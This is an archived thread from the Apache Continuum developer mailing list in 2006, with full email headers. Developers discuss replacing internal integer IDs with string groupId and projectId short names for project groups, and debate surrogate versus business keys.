as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 08:38:22 -0800 Received: by nf-out-0910.google.com with SMTP id h2so1821812nfe for <[email protected]>; Sat, 04 Nov 2006 08:38:01 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=SPwOlZDMTwjnwNmWgvthOQxqTlapW6tfC3of/gCOEuPqKT6Jl/YKDtkwesXXbw8ukylyPxiK6HSBLSydDMFz3v/5wUmc+nLcd8+Aym3AeqkvyGy9JuftZY9yoCtDDiax4VgMD+h0Dlh5fMsyZDKKd8Ij5nwSjEsmcDZilmKq/sU= Received: by 161.129.204.104 with SMTP id y5mr1010179buc.1162658277633; Sat, 04 Nov 2006 08:37:57 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 4 Nov 2006 08:37:57 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 4 Nov 2006 10:37:57 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: project group shortcuts In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org oh, and perhaps I ought to do this on a quick branch for the duration of it... jesse On 11/4/06, Jesse McConnell <[email protected]> wrote: > Ok, I am going to try this out I think, here is a laundry list of what > would happen followed by the benefits. > > * the id on project group and project classes usage is deprecated and > goes back to being internal to the store, nothing references to a > project or a group by 0,1,2,3 etc anymore. > > * groupId on the project group class becomes the unique string by > which you access a project group, it is currently kinda floating > around usage wise as sometimes the groupId from the pom loaded up on > m2 projects > * projectId is added to Project and is the unique string by which you > refer to a project in a project group > > * groupId and projectId would be restricted to [a-zA-Z0-9.-] with no > spaces and are the short names to refer to these group and project > objects on the UI layer and everywhere else in continuum > > * cascading effects throughout a large chunk of continuum as the > integer projectId and the freeform strings for projectGroupName and > integer projectGroupId are deprecated and converted to the short > names. > > benefits: > > * UI layer will standardize on how to refer to project groups and > projects in those groups, without passing around internal jdo store > identifiers, free form text strings or even the combination of both of > those in some cases (this is a failing of mine from the project group > refactor I did, it made the UI work clunkier in referring to these > things) > > * by treating m1/ant/shell/m2 projects the same in the UI it should > alleviate a ton of oddball UI issues that are cropping up where groups > are created, not created, not referred to correctly, names not being > passed around between linked actions, etc > > * following a convention for naming your groups and projects across > instances of continuum will make clustering a lot easier, group 7 on > this instance isn't necessarily group 7 in that instance > > * specifying the string group Id that you will refer to that group by > on the adding of the project will allow you to load up multiple > instances of the same project (ex one instance on trunk and one on a > branch) into the same instance of continuum (versions in the poms for > m2 should lets these play together nicely), right now I think the > projects from that second addition will just add into the same project > group unless you rename the name in the pom you are loading > > * the unique string project Id can be the same for the same project > across multiple usages of that project in different groups, letting > you refer to them as [Doxia/DoxiaCore] and [Doxia1.2/DoxiaCore] > > * m1/shell/m2/ant project groups are referred to in the exact same > way, and get their values from the same source, on the adding of the > group and underlying projects > > * we can have a GroupNamingMapper and ProjectNamingMapper interface > that can be configurable to be used in the automatic generation of the > string groupId and projectId so this naming process can be automated > by following a convention in the naming of the poms for m2 > > * the groupId and projectId string values can be edited at any time, > letting the user load up the Doxia group and then later change it to > the DoxiaTrunk group and then add in a DoxiaBranchFoo group > > I am sure there are other benefits, but these are the ones that keep > pointing me in this direction. I just think that we really need to > take a step like this to clean up a lot of messy interactions between > the UI layer and continuum core and the confusing mishmash of webwork > action linkages involving groups and projects. > > anyone have any thoughts on this? I am pretty sure I can have this > all done in a couple of days of work and I really think it will help > maintenance and future development. > > jesse > > > On 10/30/06, Jesse McConnell <[email protected]> wrote: > > > > last week I mentioned this in rahul's zero-conf mail > > > > > if this is really what we want to change here then perhaps we ought to > > > make it an option for configuration of the project group in all cases, > > > the ability to specify the name of the project group...or give it some > > > kinda short identification element. I kinda like that idea, then we > > > can use 'Doxia' for 'The Doxia Project' and we can even use the short > > > user input project group Id in the urls... > > > > > > > to do this I would put a textfield on the project group creation screens and > > then an edittable one in the project config screens, and add it to the > > model. This shortcut would replace the locations where the projectGroupName > > is currently being passed around on actions to let projects know what group > > is being interacted with. Api changes obviously to support this as well, > > but I don't think this would be too terribly bad to get into place. We get > > to avoid passing around the jdo projectGroupId values which might get screwy > > with clustering if we have different stores and the project groups are not > > in sync. > > > > We would also be able to do some mapping to allow for direct url friendly > > linking to the summary pages > > > > http://ci.goo.org:9090/Doxia which would go to the groupSummary page for the > > Doxia project. > > > > Does anyone have any objections to adding this functionality? It would > > clean up the interactions for the webwork actions dealing with project names > > (having "The Doxia Project" passed around on the url's is kinda chintz) not > > to mention allow the m1/m2/ant/shell project groups have a consistent way to > > referring to the project group concept. I can see a lot of bonuses and no > > downsides right now...I think it will clean up a lot of different > > interactions. > > > > jesse > > > > -- > > jesse mcconnell > > [email protected] > > > > > -- > jesse mcconnell > [email protected] > -- jesse mcconnell [email protected] From [email protected] Sat Nov 04 17:47:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94385 invoked from network); 4 Nov 2006 17:46:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 17:46:56 -0000 Received: (qmail 17789 invoked by uid 500); 4 Nov 2006 17:47:07 -0000 Delivered-To: [email protected] Received: (qmail 17766 invoked by uid 500); 4 Nov 2006 17:47:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17755 invoked by uid 99); 4 Nov 2006 17:47:07 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 09:47:07 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 09:46:54 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id 0F36DAD43C8 for <[email protected]>; Sat, 4 Nov 2006 13:04:01 -0500 (EST) Message-ID: <[email protected]> Date: Sat, 04 Nov 2006 12:46:12 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: project group shortcuts References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------050307050608030403030805" X-Virus-Checked: Checked by ClamAV on apache.org --------------050307050608030403030805 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit This sounds pretty good, but I want to make sure of something - the groupId and projectId should obviously be editable, so you can have alternate branches of the same groupId/artifactId maven combo within the same continuum instance. To that end, the project import should probably have an option to specify at load time what hte groupId will be for the group, to allow you to import the default first, then import another later that shares the same real maven groupId. To that end, also, I think that the projects should still have an internal primary key that's integer based, but that (continuum) groupId+projectId should be an alternate "business key" for the integerId. This, of course, to avoid craziness between multiple copies of project groups. Otherwise, I think this can make the whole thing quite a bit easier to deal with. Christian. Jesse McConnell wrote: > Ok, I am going to try this out I think, here is a laundry list of what > would happen followed by the benefits. > > * the id on project group and project classes usage is deprecated and > goes back to being internal to the store, nothing references to a > project or a group by 0,1,2,3 etc anymore. > > * groupId on the project group class becomes the unique string by > which you access a project group, it is currently kinda floating > around usage wise as sometimes the groupId from the pom loaded up on > m2 projects > * projectId is added to Project and is the unique string by which you > refer to a project in a project group > > * groupId and projectId would be restricted to [a-zA-Z0-9.-] with no > spaces and are the short names to refer to these group and project > objects on the UI layer and everywhere else in continuum > > * cascading effects throughout a large chunk of continuum as the > integer projectId and the freeform strings for projectGroupName and > integer projectGroupId are deprecated and converted to the short > names. > > benefits: > > * UI layer will standardize on how to refer to project groups and > projects in those groups, without passing around internal jdo store > identifiers, free form text strings or even the combination of both of > those in some cases (this is a failing of mine from the project group > refactor I did, it made the UI work clunkier in referring to these > things) > > * by treating m1/ant/shell/m2 projects the same in the UI it should > alleviate a ton of oddball UI issues that are cropping up where groups > are created, not created, not referred to correctly, names not being > passed around between linked actions, etc > > * following a convention for naming your groups and projects across > instances of continuum will make clustering a lot easier, group 7 on > this instance isn't necessarily group 7 in that instance > > * specifying the string group Id that you will refer to that group by > on the adding of the project will allow you to load up multiple > instances of the same project (ex one instance on trunk and one on a > branch) into the same instance of continuum (versions in the poms for > m2 should lets these play together nicely), right now I think the > projects from that second addition will just add into the same project > group unless you rename the name in the pom you are loading > > * the unique string project Id can be the same for the same project > across multiple usages of that project in different groups, letting > you refer to them as [Doxia/DoxiaCore] and [Doxia1.2/DoxiaCore] > > * m1/shell/m2/ant project groups are referred to in the exact same > way, and get their values from the same source, on the adding of the > group and underlying projects > > * we can have a GroupNamingMapper and ProjectNamingMapper interface > that can be configurable to be used in the automatic generation of the > string groupId and projectId so this naming process can be automated > by following a convention in the naming of the poms for m2 > > * the groupId and projectId string values can be edited at any time, > letting the user load up the Doxia group and then later change it to > the DoxiaTrunk group and then add in a DoxiaBranchFoo group > > I am sure there are other benefits, but these are the ones that keep > pointing me in this direction. I just think that we really need to > take a step like this to clean up a lot of messy interactions between > the UI layer and continuum core and the confusing mishmash of webwork > action linkages involving groups and projects. > > anyone have any thoughts on this? I am pretty sure I can have this > all done in a couple of days of work and I really think it will help > maintenance and future development. > > jesse > > > On 10/30/06, Jesse McConnell <[email protected]> wrote: >> >> last week I mentioned this in rahul's zero-conf mail >> >> > if this is really what we want to change here then perhaps we ought to >> > make it an option for configuration of the project group in all cases, >> > the ability to specify the name of the project group...or give it some >> > kinda short identification element. I kinda like that idea, then we >> > can use 'Doxia' for 'The Doxia Project' and we can even use the short >> > user input project group Id in the urls... >> > >> >> to do this I would put a textfield on the project group creation >> screens and >> then an edittable one in the project config screens, and add it to the >> model. This shortcut would replace the locations where the >> projectGroupName >> is currently being passed around on actions to let projects know what >> group >> is being interacted with. Api changes obviously to support this as >> well, >> but I don't think this would be too terribly bad to get into place. >> We get >> to avoid passing around the jdo projectGroupId values which might get >> screwy >> with clustering if we have different stores and the project groups >> are not >> in sync. >> >> We would also be able to do some mapping to allow for direct url >> friendly >> linking to the summary pages >> >> http://ci.goo.org:9090/Doxia which would go to the groupSummary page >> for the >> Doxia project. >> >> Does anyone have any objections to adding this functionality? It would >> clean up the interactions for the webwork actions dealing with >> project names >> (having "The Doxia Project" passed around on the url's is kinda >> chintz) not >> to mention allow the m1/m2/ant/shell project groups have a consistent >> way to >> referring to the project group concept. I can see a lot of bonuses >> and no >> downsides right now...I think it will clean up a lot of different >> interactions. >> >> jesse >> >> -- >> jesse mcconnell >> [email protected] >> > > -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------050307050608030403030805-- From [email protected] Sat Nov 04 19:17:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9381 invoked from network); 4 Nov 2006 19:17:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 19:17:51 -0000 Received: (qmail 89886 invoked by uid 500); 4 Nov 2006 19:18:02 -0000 Delivered-To: [email protected] Received: (qmail 89851 invoked by uid 500); 4 Nov 2006 19:18:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89840 invoked by uid 99); 4 Nov 2006 19:18:02 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 11:18:02 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 11:17:48 -0800 Received: by nf-out-0910.google.com with SMTP id h2so1861516nfe for <[email protected]>; Sat, 04 Nov 2006 11:17:27 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Ve+uOQ7tt/9RBCZyjmRcvtgbMydXWFLMLB+KrUnonsM37TgBDHM5M6dzZTciTh8830cj3rf006p36wM4WWcIilxKP/qvN5MeFAUXJKvhwW4pvisFRC8scheq2jYMwLVL+MnIYxdhOXq7wgg6w1ehSNplEuMhbLeguZR/MduR1Mo= Received: by 161.129.204.104 with SMTP id a5mr1018237bue.1162667845675; Sat, 04 Nov 2006 11:17:25 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 4 Nov 2006 11:17:25 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 4 Nov 2006 13:17:25 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: project group shortcuts In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 11/4/06, Christian Edward Gruber <[email protected]> wrote: > This sounds pretty good, but I want to make sure of something - the > groupId and projectId should obviously be editable, so you can have > alternate branches of the same groupId/artifactId maven combo within the > same continuum instance. To that end, the project import should > probably have an option to specify at load time what hte groupId will be > for the group, to allow you to import the default first, then import > another later that shares the same real maven groupId. yes, I envision a slight reworked adding project flow where you can fill these groupId and projectId's in...with a default mapping that just maybe shoves all the words of the name together (the ProjectNameMapper thing referred to above) > To that end, also, I think that the projects should still have an > internal primary key that's integer based, but that (continuum) > groupId+projectId should be an alternate "business key" for the > integerId. This, of course, to avoid craziness between multiple copies > of project groups. right, the Project already has an id which is integer and is the store key for that object, I am proposing here that we stop using these internal store id's all over the place in the UI and other code. and your right, groupId + projectId (the string short names) would be the business key for this, they would together be unique always. I think projectId could be shared across multiple groups though, so to get a particular one of those you would need to know the groupId to get it from. jesse > Otherwise, I think this can make the whole thing quite a bit easier to > deal with. thats the idea, the current way the group names and integer id's are tossed around is very frustrating to deal with, and the integer project id's from jdo that are passed around all over the place make it a pain to determine what is being worked with in the code, without cracking up the database or poking through checked out poms in the working directory. jesse > > Jesse McConnell wrote: > > Ok, I am going to try this out I think, here is a laundry list of what > > would happen followed by the benefits. > > > > * the id on project group and project classes usage is deprecated and > > goes back to being internal to the store, nothing references to a > > project or a group by 0,1,2,3 etc anymore. > > > > * groupId on the project group class becomes the unique string by > > which you access a project group, it is currently kinda floating > > around usage wise as sometimes the groupId from the pom loaded up on > > m2 projects > > * projectId is added to Project and is the unique string by which you > > refer to a project in a project group > > > > * groupId and projectId would be restricted to [a-zA-Z0-9.-] with no > > spaces and are the short names to refer to these group and project > > objects on the UI layer and everywhere else in continuum > > > > * cascading effects throughout a large chunk of continuum as the > > integer projectId and the freeform strings for projectGroupName and > > integer projectGroupId are deprecated and converted to the short > > names. > > > > benefits: > > > > * UI layer will standardize on how to refer to project groups and > > projects in those groups, without passing around internal jdo store > > identifiers, free form text strings or even the combination of both of > > those in some cases (this is a failing of mine from the project group > > refactor I did, it made the UI work clunkier in referring to these > > things) > > > > * by treating m1/ant/shell/m2 projects the same in the UI it should > > alleviate a ton of oddball UI issues that are cropping up where groups > > are created, not created, not referred to correctly, names not being > > passed around between linked actions, etc > > > > * following a convention for naming your groups and projects across > > instances of continuum will make clustering a lot easier, group 7 on > > this instance isn't necessarily group 7 in that instance > > > > * specifying the string group Id that you will refer to that group by > > on the adding of the project will allow you to load up multiple > > instances of the same project (ex one instance on trunk and one on a > > branch) into the same instance of continuum (versions in the poms for > > m2 should lets these play together nicely), right now I think the > > projects from that second addition will just add into the same project > > group unless you rename the name in the pom you are loading > > > > * the unique string project Id can be the same for the same project > > across multiple usages of that project in different groups, letting > > you refer to them as [Doxia/DoxiaCore] and [Doxia1.2/DoxiaCore] > > > > * m1/shell/m2/ant project groups are referred to in the exact same > > way, and get their values from the same source, on the adding of the > > group and underlying projects > > > > * we can have a GroupNamingMapper and ProjectNamingMapper interface > > that can be configurable to be used in the automatic generation of the > > string groupId and projectId so this naming process can be automated > > by following a convention in the naming of the poms for m2 > > > > * the groupId and projectId string values can be edited at any time, > > letting the user load up the Doxia group and then later change it to > > the DoxiaTrunk group and then add in a DoxiaBranchFoo group > > > > I am sure there are other benefits, but these are the ones that keep > > pointing me in this direction. I just think that we really need to > > take a step like this to clean up a lot of messy interactions between > > the UI layer and continuum core and the confusing mishmash of webwork > > action linkages involving groups and projects. > > > > anyone have any thoughts on this? I am pretty sure I can have this > > all done in a couple of days of work and I really think it will help > > maintenance and future development. > > > > jesse > > > > > > On 10/30/06, Jesse McConnell <[email protected]> wrote: > >> > >> last week I mentioned this in rahul's zero-conf mail > >> > >> > if this is really what we want to change here then perhaps we ought to > >> > make it an option for configuration of the project group in all cases, > >> > the ability to specify the name of the project group...or give it some > >> > kinda short identification element. I kinda like that idea, then we > >> > can use 'Doxia' for 'The Doxia Project' and we can even use the short > >> > user input project group Id in the urls... > >> > > >> > >> to do this I would put a textfield on the project group creation > >> screens and > >> then an edittable one in the project config screens, and add it to the > >> model. This shortcut would replace the locations where the > >> projectGroupName > >> is currently being passed around on actions to let projects know what > >> group > >> is being interacted with. Api changes obviously to support this as > >> well, > >> but I don't think this would be too terribly bad to get into place. > >> We get > >> to avoid passing around the jdo projectGroupId values which might get > >> screwy > >> with clustering if we have different stores and the project groups > >> are not > >> in sync. > >> > >> We would also be able to do some mapping to allow for direct url > >> friendly > >> linking to the summary pages > >> > >> http://ci.goo.org:9090/Doxia which would go to the groupSummary page > >> for the > >> Doxia project. > >> > >> Does anyone have any objections to adding this functionality? It would > >> clean up the interactions for the webwork actions dealing with > >> project names > >> (having "The Doxia Project" passed around on the url's is kinda > >> chintz) not > >> to mention allow the m1/m2/ant/shell project groups have a consistent > >> way to > >> referring to the project group concept. I can see a lot of bonuses > >> and no > >> downsides right now...I think it will clean up a lot of different > >> interactions. > >> > >> jesse > >> > >> -- > >> jesse mcconnell > >> [email protected] > >> > > > > > > > -- > > *christian** gruber + process coach and architect* > > *Israfil Consulting Services Corporation* > > *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* > > > -- jesse mcconnell [email protected] From [email protected] Sat Nov 04 19:51:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12502 invoked from network); 4 Nov 2006 19:51:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 19:51:23 -0000 Received: (qmail 16231 invoked by uid 500); 4 Nov 2006 19:51:34 -0000 Delivered-To: [email protected] Received: (qmail 16090 invoked by uid 500); 4 Nov 2006 19:51:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16079 invoked by uid 99); 4 Nov 2006 19:51:34 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 11:51:34 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 11:51:21 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id 78FADAD43C9 for <[email protected]>; Sat, 4 Nov 2006 15:08:27 -0500 (EST) Message-ID: <[email protected]> Date: Sat, 04 Nov 2006 14:50:42 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: project group shortcuts References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------050803030906070502080709" X-Virus-Checked: Checked by ClamAV on apache.org --------------050803030906070502080709 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Cool, more comment in-line. Jesse McConnell wrote: > On 11/4/06, Christian Edward Gruber <[email protected]> wrote: >> To that end, also, I think that the projects should still have an >> internal primary key that's integer based, but that (continuum) >> groupId+projectId should be an alternate "business key" for the >> integerId. This, of course, to avoid craziness between multiple copies >> of project groups. > > right, the Project already has an id which is integer and is the store > key for that object, I am proposing here that we stop using these > internal store id's all over the place in the UI and other code. and > your right, groupId + projectId (the string short names) would be the > business key for this, they would together be unique always. I think > projectId could be shared across multiple groups though, so to get a > particular one of those you would need to know the groupId to get it > from. Meh. I'm not a fan of compound-primary-keys, except on join tables, or when you really have to. If these projectIds are surrogate keys, then they should be unique, with a foreign-key to groupId to maintain the strong relationship. Joins get torturous (and more expensive) when you have compound primary keys, and the further out your join-tables, the more times you replicate several keys. If we're separating surrogate keys from business keys, then let's keep single unique surrogate keys as primary keys, and leave the composite stuff for business keys. Just my opinionated view... :) Christian -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------050803030906070502080709-- From [email protected] Sat Nov 04 20:33:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23767 invoked from network); 4 Nov 2006 20:33:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 20:33:29 -0000 Received: (qmail 52475 invoked by uid 500); 4 Nov 2006 20:33:40 -0000 Delivered-To: [email protected] Received: (qmail 52455 invoked by uid 500); 4 Nov 2006 20:33:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52444 invoked by uid 99); 4 Nov 2006 20:33:40 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 12:33:40 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 12:33:28 -0800 Received: by nf-out-0910.google.com with SMTP id h2so1879352nfe for <[email protected]>; Sat, 04 Nov 2006 12:33:07 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=X8xFyCYvN/Tl9tptqu0WFHUK1zUqaBoNBLwgX9sJQoQWGFsEw/xgF/hDEsEdukwd4xuoj3EsFiIMvsVQtdh7c13K0flToo7xiE0sGrQixiAFkRNIER0RuoIEGY80BLmPXsXjM35ysB42McYsL96hCDCbZ6SD2S1gTbAd3uUxJqk= Received: by 161.129.204.104 with SMTP id h19mr1033960buc.1162672386643; Sat, 04 Nov 2006 12:33:06 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 4 Nov 2006 12:33:06 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 4 Nov 2006 14:33:06 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: project group shortcuts In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org I am not actually referring to anything about how they are stored in the database, that is purely integer keys in the jdo store in in this case, the projects are logically stored in the group object that is persisted into whatever store. I am referring to how you programmatically refer to them, to access the group you ask for it by the string groupId, to get a particular project you need to know the group id it is in and then the string projectId of that project. right now it is possible to get the project instance directly by knowing the integer id of that project which is currently that internal jdo index number. this would be so that you could have two instance of a project group loaded up and maintain the same projectIds for the same projects in those groups, and then distinguish between them by the group they are a member of. this is because I think it would be annoying as sin to load up Doxia and make a DoxiaCore project in it, and then load up a DoxiaBranchFoo and have to name the DoxiaCore something like DoxiaCoreBranch just to make it unique. is that clearer? jesse p.s. great feedback, thanks On 11/4/06, Christian Edward Gruber <[email protected]> wrote: > Cool, more comment in-line. > > Jesse McConnell wrote: > > On 11/4/06, Christian Edward Gruber <[email protected]> wrote: > >> To that end, also, I think that the projects should still have an > >> internal primary key that's integer based, but that (continuum) > >> groupId+projectId should be an alternate "business key" for the > >> integerId. This, of course, to avoid craziness between multiple copies > >> of project groups. > > > > right, the Project already has an id which is integer and is the store > > key for that object, I am proposing here that we stop using these > > internal store id's all over the place in the UI and other code. and > > your right, groupId + projectId (the string short names) would be the > > business key for this, they would together be unique always. I think > > projectId could be shared across multiple groups though, so to get a > > particular one of those you would need to know the groupId to get it > > from. > Meh. I'm not a fan of compound-primary-keys, except on join tables, or > when you really have to. If these projectIds are surrogate keys, then > they should be unique, with a foreign-key to groupId to maintain the > strong relationship. Joins get torturous (and more expensive) when you > have compound primary keys, and the further out your join-tables, the > more times you replicate several keys. If we're separating surrogate > keys from business keys, then let's keep single unique surrogate keys as > primary keys, and leave the composite stuff for business keys. Just my > opinionated view... :) > > Christian > -- > > *christian** gruber + process coach and architect* > > *Israfil Consulting Services Corporation* > > *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* > > > -- jesse mcconnell [email protected] From [email protected] Sat Nov 04 21:54:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38816 invoked from network); 4 Nov 2006 21:54:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Nov 2006 21:54:54 -0000 Received: (qmail 39313 invoked by uid 500); 4 Nov 2006 21:55:05 -0000 Delivered-To: [email protected] Received: (qmail 39292 invoked by uid 500); 4 Nov 2006 21:55:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39281 invoked by uid 99); 4 Nov 2006 21:55:05 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 13:55:05 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 04 Nov 2006 13:54:52 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id CD080AD43C8 for <[email protected]>; Sat, 4 Nov 2006 17:12:04 -0500 (EST) Message-ID: <[email protected]> Date: Sat, 04 Nov 2006 16:54:17 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20060909) MIME-Version: 1.0 To: [email protected] Subject: Re: project group shortcuts References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------070405070506040509070806" X-Virus-Checked: Checked by ClamAV on apache.org --------------070405070506040509070806 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Yep. Compound business keys == good. Compound surrogate (raw database) keys == bad. :) I'm with the program. Please proceed. It sounds awesome. Christian. Jesse McConnell wrote: > I am not actually referring to anything about how they are stored in > the database, that is purely integer keys in the jdo store in in this > case, the projects are logically stored in the group object that is > persisted into whatever store. > > I am referring to how you programmatically refer to them, to access > the group you ask for it by the string groupId, to get a particular > project you need to know the group id it is in and then the string > projectId of that project. right now it is possible to get the > project instance directly by knowing the integer id of that project > which is currently that internal jdo index number. > > this would be so that you could have two instance of a project group > loaded up and maintain the same 